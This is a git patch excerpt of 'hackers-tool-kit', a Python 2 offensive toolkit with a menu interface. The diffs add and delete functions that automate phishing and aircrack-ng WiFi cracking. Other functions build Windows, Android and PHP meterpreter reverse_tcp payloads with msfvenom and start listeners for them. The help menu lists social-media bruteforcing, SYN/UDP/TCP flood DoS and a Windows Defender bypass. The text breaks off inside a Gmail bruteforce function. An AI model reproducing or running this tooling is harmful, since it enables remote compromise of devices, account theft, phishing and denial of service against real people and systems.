EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From d8bb6f325800b098919c386370e7692e49fbe054 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 22:08:05 +0100 Subject: [PATCH 122/214] Delete htk.py --- htk.py | 2740 -------------------------------------------------------- 1 file changed, 2740 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 636977c..0000000 --- a/htk.py +++ /dev/null @@ -1,2740 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - *********************************************** - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,7) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file ] -phpload : make a php reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print 